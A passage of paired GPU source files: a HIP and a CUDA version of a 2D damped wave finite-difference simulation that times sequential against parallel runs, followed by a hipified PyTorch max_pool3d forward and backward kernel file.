2) + j) % (N - 2) + 1; int x = (i / DECOMPOSITION_PER_ROW) + 1; int y = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[x * N + y] = Rho * (u1_dev[(x - 1) * N + y] + u1_dev[(x + 1) * N + y] + u1_dev[x * N + (y - 1)] + u1_dev[x * N + (y + 1)] - 4 * u1_dev[x * N + y]); u_dev[x * N + y] += 2 * u1_dev[x * N + y] - (1 - Eta) * u2_dev[x * N + y]; u_dev[x * N + y] /= (1 + Eta); } } } __global__ void iteration_parallel_edge(float* u_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i >= 0 && i < NUM_THREADS_EDGE / 4) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[0 * N + offset] = G * u_dev[1 * N + offset]; } } if (i >= NUM_THREADS_EDGE / 4 && i < NUM_THREADS_EDGE / 4 * 2) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[(N - 1) * N + offset] = G * u_dev[(N - 2) * N + offset]; } } if (i >= NUM_THREADS_EDGE / 4 * 2 && i < NUM_THREADS_EDGE / 4 * 3) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[offset * N + 0] = G * u_dev[offset * N + 1]; } } if (i >= NUM_THREADS_EDGE / 4 * 3 && i < NUM_THREADS_EDGE) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // 
index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[offset * N + (N - 1)] = G * u_dev[offset * N + (N - 2)]; } } } __global__ void iteration_parallel_update(float* u_dev, float* u1_dev, float* u2_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i < N * N) { u2_dev[i] = u1_dev[i]; u1_dev[i] = u_dev[i]; } } int main(int argc, char* argv[]) { printf("argc = %d, argv = %s\n", argc, argv[1]); int T = atoi(argv[1]); float* u = (float*)malloc(N * N * sizeof(float)); float* u1 = (float*)malloc(N * N * sizeof(float)); float* u2 = (float*)malloc(N * N * sizeof(float)); for (int i = 0; i < N * N; i++) { u[i] = 0.f; u1[i] = 0.f; u2[i] = 0.f; } ////////////////////////////// // sequential approach clock_t start, end; start = clock(); for (int i = 0; i < T; i++) { if (i == 0) u1[(N / 2) * N + (N / 2)] += 1; printf("Iteration: %d, ", i); iteration_sequential(u, u1, u2); printf("(%d,%d): ", N / 2, N / 2); printf("%.6f\n", u[(N / 2) * N + (N / 2)]); } end = clock(); printf("Time spent = %f\n", (double)(end - start) / (double)CLOCKS_PER_SEC); ////////////////////////////// printf("\n\n"); ////////////////////////////// // parallel approach hipSetDevice(0); float* u_dev; float* u1_dev; float* u2_dev; hipMallocManaged((void**)&u_dev, N * N * sizeof(float)); hipMallocManaged((void**)&u1_dev, N * N * sizeof(float)); hipMallocManaged((void**)&u2_dev, N * N * sizeof(float)); for (int i = 0; i < N * N; i++) { u_dev[i] = 0.f; u1_dev[i] = 0.f; u2_dev[i] = 0.f; } start = clock(); for (int i = 0; i < T; i++) { if (i == 0) u1_dev[(N / 2) * N + (N / 2)] += 1; printf("Iteration: %d, ", i); iteration_parallel_central << <NUM_BLOCKS, 1024 >> > (u_dev, u1_dev, u2_dev); hipDeviceSynchronize(); /*hipError_t error = hipGetLastError(); if (error != hipSuccess) { fprintf(stderr, "ERROR: %s \n", hipGetErrorString(error)); }*/ iteration_parallel_edge << <NUM_BLOCKS_EDGE, 1024 >> > (u_dev); hipDeviceSynchronize(); u_dev[0 * N + 0] = G * u_dev[1 * N + 0]; u_dev[(N - 1) * N + 0] = G * u_dev[(N - 2) * N + 0]; u_dev[0 * N + (N - 1)] = G * u_dev[0 * N + (N - 2)]; u_dev[(N - 1) * N + (N - 1)] = G * u_dev[(N - 1) * N + (N - 2)]; iteration_parallel_update << <((N * N) + 1024 - (N * N) % 1024) / 1024, 1024 >> > (u_dev, u1_dev, u2_dev); hipDeviceSynchronize(); printf("(%d,%d): ", N / 2, N / 2); printf("%.6f\n", u_dev[(N / 2) * N + (N / 2)]); } end = clock(); printf("Time spent = %f\n", (double)(end - start) / (double)CLOCKS_PER_SEC); hipFree(u_dev); hipFree(u1_dev); hipFree(u2_dev); ////////////////////////////// return 0; }
57b8f32a28778fba6aa863b0eb63b51474ae0c61.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <stdlib.h> #include <time.h> #define Rho 0.5 #define Eta 0.0002 #define G 0.75 #define N 512 #define DECOMPOSITION_PER_ROW 51 // row decomposition, furthermore devide a row into multiple pieces, minimum is 1 #define ELEMENT_PER_THREAD (N - 2) / DECOMPOSITION_PER_ROW // one thread handles all the elements in a single piece #define NUM_THREADS ((N - 2) * (N - 2)) / ((N - 2) / DECOMPOSITION_PER_ROW) #define NUM_THREADS_EDGE 4 * DECOMPOSITION_PER_ROW #define NUM_BLOCKS (NUM_THREADS + 1024 - NUM_THREADS % 1024) / 1024 #define NUM_BLOCKS_EDGE (NUM_THREADS_EDGE + 1024 - NUM_THREADS_EDGE % 1024) / 1024 void iteration_sequential(float u[N * N], float u1[N * N], float u2[N * N]) { clock_t start, end; for (int i = 1; i <= N - 2; i++) { for (int j = 1; j <= N - 2; j++) { u[i * N + j] = Rho * (u1[(i - 1) * N + j] + u1[(i + 1) * N + j] + u1[i * N + (j - 1)] + u1[i * N + (j + 1)] - 4 * u1[i * N + j]); u[i * N + j] += 2 * u1[i * N + j] - (1 - Eta) * u2[i * N + j]; u[i * N + j] /= (1 + Eta); } } for (int i = 1; i <= N - 2; i++) { u[0 * N + i] = G * u[1 * N + i]; u[(N - 1) * N + i] = G * u[(N - 2) * N + i]; u[i * N + 0] = G * u[i * N + 1]; u[i * N + (N - 1)] = G * u[i * N + (N - 2)]; } u[0 * N + 0] = G * u[1 * N + 0]; u[(N - 1) * N + 0] = G * u[(N - 2) * N + 0]; u[0 * N + (N - 1)] = G * u[0 * N + (N - 2)]; u[(N - 1) * N + (N - 1)] = G * u[(N - 1) * N + (N - 2)]; for (int i = 0; i < N * N; i++) { u2[i] = u1[i]; u1[i] = u[i]; } /*for (int i = 0; i < N * N; i++) { printf("(%d,%d): ", i / N, i % N); printf("%.6f ", u[i]); if ((i + 1) % N == 0) printf("\n"); }*/ } __global__ void iteration_parallel_central(float* u_dev, float* u1_dev, float* u2_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i < NUM_THREADS) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] // int x = (i * (N - 2) + j) / (N - 2) + 1; // int y = (i * (N - 2) + j) % (N - 2) + 1; int x = (i / DECOMPOSITION_PER_ROW) + 1; int y = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[x * N + y] = Rho * (u1_dev[(x - 1) * N + y] + u1_dev[(x + 1) * N + y] + u1_dev[x * N + (y - 1)] + u1_dev[x * N + (y + 1)] - 4 * u1_dev[x * N + y]); u_dev[x * N + y] += 2 * u1_dev[x * N + y] - (1 - Eta) * u2_dev[x * N + y]; u_dev[x * N + y] /= (1 + Eta); } } } __global__ void iteration_parallel_edge(float* u_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i >= 0 && i < NUM_THREADS_EDGE / 4) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[0 * N + offset] = G * u_dev[1 * N + offset]; } } if (i >= NUM_THREADS_EDGE / 4 && i < NUM_THREADS_EDGE / 4 * 2) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[(N - 1) * N + offset] = G * u_dev[(N - 2) * N + offset]; } } if (i >= NUM_THREADS_EDGE / 4 * 2 && i < NUM_THREADS_EDGE / 4 * 3) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[offset * N + 0] = G * u_dev[offset * N + 1]; } } if (i >= NUM_THREADS_EDGE / 4 * 3 && i < NUM_THREADS_EDGE) { for (int j = 0; j < ELEMENT_PER_THREAD; j++) { // index conversion from 2D to flat: u[i][j] = u[x * N + y] int 
offset = (i % DECOMPOSITION_PER_ROW) * ELEMENT_PER_THREAD + 1 + j; u_dev[offset * N + (N - 1)] = G * u_dev[offset * N + (N - 2)]; } } } __global__ void iteration_parallel_update(float* u_dev, float* u1_dev, float* u2_dev) { int i = blockIdx.x * blockDim.x + threadIdx.x; if (i < N * N) { u2_dev[i] = u1_dev[i]; u1_dev[i] = u_dev[i]; } } int main(int argc, char* argv[]) { printf("argc = %d, argv = %s\n", argc, argv[1]); int T = atoi(argv[1]); float* u = (float*)malloc(N * N * sizeof(float)); float* u1 = (float*)malloc(N * N * sizeof(float)); float* u2 = (float*)malloc(N * N * sizeof(float)); for (int i = 0; i < N * N; i++) { u[i] = 0.f; u1[i] = 0.f; u2[i] = 0.f; } ////////////////////////////// // sequential approach clock_t start, end; start = clock(); for (int i = 0; i < T; i++) { if (i == 0) u1[(N / 2) * N + (N / 2)] += 1; printf("Iteration: %d, ", i); iteration_sequential(u, u1, u2); printf("(%d,%d): ", N / 2, N / 2); printf("%.6f\n", u[(N / 2) * N + (N / 2)]); } end = clock(); printf("Time spent = %f\n", (double)(end - start) / (double)CLOCKS_PER_SEC); ////////////////////////////// printf("\n\n"); ////////////////////////////// // parallel approach cudaSetDevice(0); float* u_dev; float* u1_dev; float* u2_dev; cudaMallocManaged((void**)&u_dev, N * N * sizeof(float)); cudaMallocManaged((void**)&u1_dev, N * N * sizeof(float)); cudaMallocManaged((void**)&u2_dev, N * N * sizeof(float)); for (int i = 0; i < N * N; i++) { u_dev[i] = 0.f; u1_dev[i] = 0.f; u2_dev[i] = 0.f; } start = clock(); for (int i = 0; i < T; i++) { if (i == 0) u1_dev[(N / 2) * N + (N / 2)] += 1; printf("Iteration: %d, ", i); iteration_parallel_central << <NUM_BLOCKS, 1024 >> > (u_dev, u1_dev, u2_dev); cudaDeviceSynchronize(); /*cudaError_t error = cudaGetLastError(); if (error != cudaSuccess) { fprintf(stderr, "ERROR: %s \n", cudaGetErrorString(error)); }*/ iteration_parallel_edge << <NUM_BLOCKS_EDGE, 1024 >> > (u_dev); cudaDeviceSynchronize(); u_dev[0 * N + 0] = G * u_dev[1 * N + 0]; u_dev[(N - 1) * N + 0] = G * u_dev[(N - 2) * N + 0]; u_dev[0 * N + (N - 1)] = G * u_dev[0 * N + (N - 2)]; u_dev[(N - 1) * N + (N - 1)] = G * u_dev[(N - 1) * N + (N - 2)]; iteration_parallel_update << <((N * N) + 1024 - (N * N) % 1024) / 1024, 1024 >> > (u_dev, u1_dev, u2_dev); cudaDeviceSynchronize(); printf("(%d,%d): ", N / 2, N / 2); printf("%.6f\n", u_dev[(N / 2) * N + (N / 2)]); } end = clock(); printf("Time spent = %f\n", (double)(end - start) / (double)CLOCKS_PER_SEC); cudaFree(u_dev); cudaFree(u1_dev); cudaFree(u2_dev); ////////////////////////////// return 0; }
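The decomposition macros above only produce a consistent thread-to-cell mapping when DECOMPOSITION_PER_ROW evenly divides the N - 2 interior columns: with N = 512 and DECOMPOSITION_PER_ROW = 51, ELEMENT_PER_THREAD is 510 / 51 = 10, the central kernel needs 510 * 510 / 10 = 26010 threads, and the edge kernel needs 4 * 51 = 204. A small host-only sketch that restates those macros and makes the divisibility assumption explicit (the static_assert guard and the printout are additions, not part of the original):

#include <cstdio>

// Mirrors the grid-decomposition macros from the finite-difference code above.
#define N 512
#define DECOMPOSITION_PER_ROW 51
#define ELEMENT_PER_THREAD ((N - 2) / DECOMPOSITION_PER_ROW)
#define NUM_THREADS (((N - 2) * (N - 2)) / ELEMENT_PER_THREAD)
#define NUM_THREADS_EDGE (4 * DECOMPOSITION_PER_ROW)

// The per-thread mapping in iteration_parallel_central assumes an exact split.
static_assert((N - 2) % DECOMPOSITION_PER_ROW == 0,
              "each interior row must split into equal pieces");

int main() {
  printf("elements per thread : %d\n", ELEMENT_PER_THREAD);  // 10
  printf("central threads     : %d\n", NUM_THREADS);         // 26010
  printf("edge threads        : %d\n", NUM_THREADS_EDGE);    // 204
  // Thread i of the central kernel updates interior row (i / 51) + 1,
  // columns (i % 51) * 10 + 1 through (i % 51) * 10 + 10.
  return 0;
}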
67cb304db55720a9860557b8661f98c913ccede3.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <ATen/AccumulateType.h> #include <ATen/native/Pool.h> #include <ATen/hip/HIPContext.h> #include <ATen/hip/HIPApplyUtils.cuh> #include <ATen/hip/detail/TensorInfo.cuh> #include <ATen/hip/detail/IndexUtils.cuh> #include <ATen/hip/detail/KernelUtils.h> #include <THH/THHNumerics.cuh> #include <c10/macros/Macros.h> namespace at { namespace native { namespace { __device__ inline int min(int a, int b) { return a <= b ? a : b; } template <typename scalar_t> __global__ static void max_pool3d_with_indices_single_out_frame( scalar_t* inputData, PackedTensorAccessor<scalar_t, 4> output, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int kT, int kH, int kW, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % output.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / output.size(1); // output slice/feature if (oRow < output.size(2) && oColumn < output.size(3)) { int tStart = oFrame * dT - pT; int hStart = oRow * dH - pH; int wStart = oColumn * dW - pW; int tEnd = min(tStart + (kT - 1) * dilationT + 1, itime); int hEnd = min(hStart + (kH - 1) * dilationH + 1, iheight); int wEnd = min(wStart + (kW - 1) * dilationW + 1, iwidth); while(tStart < 0) tStart += dilationT; while(hStart < 0) hStart += dilationH; while(wStart < 0) wStart += dilationW; int index = 0; int maxIndex = -1; inputData += slice * itime * iheight * iwidth; scalar_t max = THCNumerics<scalar_t>::min(); for (int t = tStart; t < tEnd; t += dilationT) { for (int h = hStart; h < hEnd; h += dilationH) { for (int w = wStart; w < wEnd; w += dilationW) { index = t * iheight * iwidth + h * iwidth + w; scalar_t val = inputData[index]; if ((max < val) || THCNumerics<scalar_t>::isnan(val)) { max = val; maxIndex = index; } } } } output[slice][oFrame][oRow][oColumn] = max; indices[slice][oFrame][oRow][oColumn] = maxIndex; } } template <int KERNEL_WIDTH, typename scalar_t> __global__ static void max_pool3d_with_indices_single_out_frame( scalar_t* inputData, PackedTensorAccessor<scalar_t, 4> output, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int kT, int kH, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % output.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / output.size(1); // output slice/feature if (oRow < output.size(2) && oColumn < output.size(3)) { int tStart = oFrame * dT - pT; int hStart = oRow * dH - pH; int wStart = oColumn * dW - pW; int tEnd = min(tStart + (kT - 1) * dilationT + 1, itime); int hEnd = min(hStart + (kH - 1) * dilationH + 1, iheight); int wEnd = min(wStart + (KERNEL_WIDTH - 1) * dilationW + 1, iwidth); while(tStart < 0) tStart += dilationT; while(hStart < 0) hStart += dilationH; while(wStart < 0) wStart += dilationW; int index = 0; int maxIndex = -1; scalar_t max = THCNumerics<scalar_t>::min(); for (int t = tStart; t < tEnd; t += dilationT) { for (int h = hStart; h < hEnd; h += dilationH) { for (int w = wStart; w < wEnd; w += dilationW) { index = t * iheight * iwidth + h * iwidth + w; scalar_t val = inputData[slice * itime * iheight * iwidth + 
index]; if (max < val) { max = val; maxIndex = index; } } } } output[slice][oFrame][oRow][oColumn] = max; indices[slice][oFrame][oRow][oColumn] = maxIndex; } } #define UPDATE_OUTPUT_KERNEL_WIDTH(KW) case KW: \ hipLaunchKernelGGL(( max_pool3d_with_indices_single_out_frame<KW>) \ , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), \ input_data, \ output.packed_accessor<scalar_t, 4>(), \ indices.packed_accessor<int64_t, 4>(), \ itime, iheight, iwidth, \ kT, kH, \ dT, dH, dW, \ pT, pH, pW, \ dilationT, dilationH, dilationW, offsetZ); \ break template <typename scalar_t> void max_pool3d_with_indices_out_frame( scalar_t* input_data, const Tensor& output, const Tensor& indices, int totalZ, int itime, int iheight, int iwidth, int otime, int oheight, int owidth, int kT, int kH, int kW, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW) { int offsetZ = 0; dim3 block(32, 8); while (totalZ > 0) { dim3 grid(cuda::ATenCeilDiv(owidth, static_cast<int>(block.x)), cuda::ATenCeilDiv(oheight, static_cast<int>(block.y)), totalZ > 65535 ? 65535 : totalZ); switch (kW) { UPDATE_OUTPUT_KERNEL_WIDTH(1); UPDATE_OUTPUT_KERNEL_WIDTH(2); UPDATE_OUTPUT_KERNEL_WIDTH(3); UPDATE_OUTPUT_KERNEL_WIDTH(4); UPDATE_OUTPUT_KERNEL_WIDTH(5); UPDATE_OUTPUT_KERNEL_WIDTH(6); UPDATE_OUTPUT_KERNEL_WIDTH(7); default: hipLaunchKernelGGL(( max_pool3d_with_indices_single_out_frame) , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), input_data, output.packed_accessor<scalar_t, 4>(), indices.packed_accessor<int64_t, 4>(), itime, iheight, iwidth, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, offsetZ); } TORCH_CHECK(hipGetLastError() == hipSuccess, "max_pool3d_backward_out_cuda_frame failed with error code ", hipGetLastError()); totalZ -= 65535; offsetZ += 65535; } } #undef UPDATE_OUTPUT_KERNEL_WIDTH template <typename scalar_t> __global__ static void max_pool3d_with_indices_backward_single_out_frame( scalar_t *gradInputData, PackedTensorAccessor<scalar_t, 4> gradOutput, PackedTensorAccessor<int64_t, 4> indices, int itime, int iheight, int iwidth, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW, int offsetZ) { int oColumn = blockIdx.x * blockDim.x + threadIdx.x; int oRow = blockIdx.y * blockDim.y + threadIdx.y; int oFrame = (blockIdx.z + offsetZ) % gradOutput.size(1); // output frame/time int slice = (blockIdx.z + offsetZ) / gradOutput.size(1); // output slice/feature if (oRow < gradOutput.size(2) && oColumn < gradOutput.size(3)) { int maxIndex = indices[slice][oFrame][oRow][oColumn]; if (maxIndex != -1) { atomicAdd(&gradInputData[slice * itime * iheight * iwidth + maxIndex], gradOutput[slice][oFrame][oRow][oColumn]); } } } template <typename scalar_t> void max_pool3d_with_indices_backward_out_frame( scalar_t *gradInputData, const Tensor& gradOutput, const Tensor& indices, int64_t totalZ, int itime, int iheight, int iwidth, int oheight, int owidth, int dT, int dH, int dW, int pT, int pH, int pW, int dilationT, int dilationH, int dilationW) { int offsetZ = 0; dim3 block(32, 8); while (totalZ > 0) { dim3 grid(cuda::ATenCeilDiv(owidth, static_cast<int>(block.x)), cuda::ATenCeilDiv(oheight, static_cast<int>(block.y)), totalZ > 65535 ? 
65535 : totalZ); hipLaunchKernelGGL(( max_pool3d_with_indices_backward_single_out_frame) , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), gradInputData, gradOutput.packed_accessor<scalar_t, 4>(), indices.packed_accessor<int64_t, 4>(), itime, iheight, iwidth, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, offsetZ); TORCH_CHECK(hipGetLastError() == hipSuccess, "max_pool3d_with_indices_backward_out_frame failed with error code ", hipGetLastError()); totalZ -= 65535; offsetZ += 65535; } } void max_pool3d_with_indices_out_cuda_template( Tensor& output, Tensor& indices, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { TensorArg output_arg{ output, "output", 1 }; TensorArg indices_arg{ indices, "indices", 2 }; TensorArg input_arg{ input, "input", 3 }; checkAllSameGPU("max_pool3d_with_indices_out_cuda", {output_arg, indices_arg, input_arg}); // #20866, #22032: Guarantee this for the official C++ API? TORCH_CHECK((kernel_size.size() == 1 || kernel_size.size() == 3) && (stride.empty() || stride.size() == 3) && (padding.size() == 1 || padding.size() == 3) && (dilation.size() == 1 || dilation.size() == 3), "max_pool3d_with_indices: internal error: all IntArrayRef sizes must be 3"); TORCH_CHECK((input.ndimension() == 4 || input.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input"); const int kT = safe_downcast<int, int64_t>(kernel_size[0]); const int kH = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[1]); const int kW = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[2]); const int dT = stride.empty() ? kT : safe_downcast<int, int64_t>(stride[0]); const int dH = stride.empty() ? kH : safe_downcast<int, int64_t>(stride[1]); const int dW = stride.empty() ? kW : safe_downcast<int, int64_t>(stride[2]); const int pT = safe_downcast<int, int64_t>(padding[0]); const int pH = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[1]); const int pW = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[2]); const int dilationT = safe_downcast<int, int64_t>(dilation[0]); const int dilationH = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[1]); const int dilationW = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[2]); const int64_t nbatch = input.ndimension() == 5 ? input.size(-5) : 1; const int64_t nslices = input.size(-4); const int64_t itime = input.size(-3); const int64_t iheight = input.size(-2); const int64_t iwidth = input.size(-1); const int64_t otime = pooling_output_shape<int64_t>(itime, kT, pT, dT, dilationT, ceil_mode); const int64_t oheight = pooling_output_shape<int64_t>(iheight, kH, pH, dH, dilationH, ceil_mode); const int64_t owidth = pooling_output_shape<int64_t>(iwidth, kW, pW, dW, dilationW, ceil_mode); pool3d_shape_check( input, nslices, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, itime, iheight, iwidth, otime, oheight, owidth); if (input.ndimension() == 4) { output.resize_({ nslices, otime, oheight, owidth}); indices.resize_({nslices, otime, oheight, owidth}); } else { output.resize_({nbatch, nslices, otime, oheight, owidth}); indices.resize_({nbatch, nslices, otime, oheight, owidth}); } Tensor work_input = input.contiguous(); Tensor work_output = output; Tensor work_indices = indices; if (input.ndimension() == 5) { // Collapse batch and feature dimensions. 
work_input = work_input.reshape({nbatch * nslices, itime, iheight, iwidth}); work_output = work_output.reshape({nbatch * nslices, otime, oheight, owidth}); work_indices = work_indices.reshape({nbatch * nslices, otime, oheight, owidth}); } AT_DISPATCH_FLOATING_TYPES_AND_HALF( input.scalar_type(), "max_pool3d_with_indices_out_frame", [&]{ scalar_t *input_data = work_input.data<scalar_t>(); int64_t totalZ = otime * nslices * nbatch; max_pool3d_with_indices_out_frame( input_data, work_output, work_indices, totalZ, itime, iheight, iwidth, otime, oheight, owidth, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW); } ); } void max_pool3d_with_indices_backward_out_cuda_template( Tensor& gradInput, const Tensor& gradOutput, const Tensor& input, const Tensor& indices, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { TensorArg gradInput_arg{ gradInput, "gradInput", 1 }; TensorArg gradOutput_arg{ gradOutput, "gradOutput", 2 }; TensorArg input_arg{ input, "input", 3 }; TensorArg indices_arg{ indices, "indices", 4 }; checkAllSameGPU("max_pool3d_with_indices_backward_out_cuda", {gradInput_arg, gradOutput_arg, input_arg, indices_arg}); // #20866, #22032: Guarantee this for the official C++ API? TORCH_CHECK((kernel_size.size() == 1 || kernel_size.size() == 3) && (stride.empty() || stride.size() == 3) && (padding.size() == 1 || padding.size() == 3) && (dilation.size() == 1 || dilation.size() == 3), "max_pool3d_with_indices: internal error: all IntArrayRef sizes must be 3"); TORCH_CHECK((input.ndimension() == 4 || input.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input"); TORCH_CHECK((gradOutput.ndimension() == 4 || gradOutput.ndimension() == 5), "non-empty 4D or 5D (batch mode) tensor expected for gradOutput"); // Resize and initialize result tensor. gradInput.resize_as_(input); gradInput.zero_(); const int kT = safe_downcast<int, int64_t>(kernel_size[0]); const int kH = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[1]); const int kW = kernel_size.size() == 1 ? kT : safe_downcast<int, int64_t>(kernel_size[2]); const int dT = stride.empty() ? kT : safe_downcast<int, int64_t>(stride[0]); const int dH = stride.empty() ? kH : safe_downcast<int, int64_t>(stride[1]); const int dW = stride.empty() ? kW : safe_downcast<int, int64_t>(stride[2]); const int pT = safe_downcast<int, int64_t>(padding[0]); const int pH = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[1]); const int pW = padding.size() == 1 ? pT : safe_downcast<int, int64_t>(padding[2]); const int dilationT = safe_downcast<int, int64_t>(dilation[0]); const int dilationH = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[1]); const int dilationW = dilation.size() == 1 ? dilationT : safe_downcast<int, int64_t>(dilation[2]); const int64_t nbatch = input.ndimension() == 5 ? 
input.size(-5) : 1; const int64_t nslices = input.size(-4); const int64_t otime = gradOutput.size(-3); const int64_t oheight = gradOutput.size(-2); const int64_t owidth = gradOutput.size(-1); const int64_t itime = gradInput.size(-3); const int64_t iheight = gradInput.size(-2); const int64_t iwidth = gradInput.size(-1); max_pool3d_backward_shape_check( input, gradOutput, indices, nslices, kT, kH, kW, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW, itime, iheight, iwidth, otime, oheight, owidth); Tensor work_grad_input = gradInput; Tensor work_grad_output = gradOutput.contiguous(); Tensor work_indices = indices.contiguous(); if (input.ndimension() == 5) { // Collapse batch and feature dimensions. work_grad_input = work_grad_input.reshape({nbatch * nslices, itime, iheight, iwidth}); work_grad_output = work_grad_output.reshape({nbatch * nslices, otime, oheight, owidth}); work_indices = work_indices.reshape({nbatch * nslices, otime, oheight, owidth}); } AT_DISPATCH_FLOATING_TYPES_AND_HALF(input.scalar_type(), "max_pool3d_with_indices_backward_out_frame", [&] { const int64_t totalZ = otime * nslices * nbatch; scalar_t *grad_input_data = work_grad_input.data<scalar_t>(); max_pool3d_with_indices_backward_out_frame( grad_input_data, work_grad_output, work_indices, totalZ, itime, iheight, iwidth, owidth, oheight, dT, dH, dW, pT, pH, pW, dilationT, dilationH, dilationW); } ); } } // namespace std::tuple<Tensor&, Tensor&> max_pool3d_with_indices_out_cuda( Tensor& output, Tensor& indices, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { max_pool3d_with_indices_out_cuda_template( output, indices, input, kernel_size, stride, padding, dilation, ceil_mode); return std::tuple<Tensor&, Tensor&>(output, indices); } std::tuple<Tensor, Tensor> max_pool3d_with_indices_cuda( const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode) { Tensor output = at::empty({0}, input.options()); Tensor indices = at::empty({0}, input.options().dtype(kLong)); max_pool3d_with_indices_out_cuda_template( output, indices, input, kernel_size, stride, padding, dilation, ceil_mode); return std::tuple<Tensor, Tensor>(output, indices); } Tensor& max_pool3d_with_indices_backward_out_cuda( Tensor& gradInput, const Tensor& gradOutput, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode, const Tensor& indices) { max_pool3d_with_indices_backward_out_cuda_template( gradInput, gradOutput, input, indices, kernel_size, stride, padding, dilation, ceil_mode); return gradInput; } Tensor max_pool3d_with_indices_backward_cuda( const Tensor& gradOutput, const Tensor& input, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef dilation, bool ceil_mode, const Tensor& indices) { auto gradInput = at::zeros_like(input); max_pool3d_with_indices_backward_out_cuda_template( gradInput, gradOutput, input, indices, kernel_size, stride, padding, dilation, ceil_mode); return gradInput; } } // at::native } // at
67cb304db55720a9860557b8661f98c913ccede3.cu
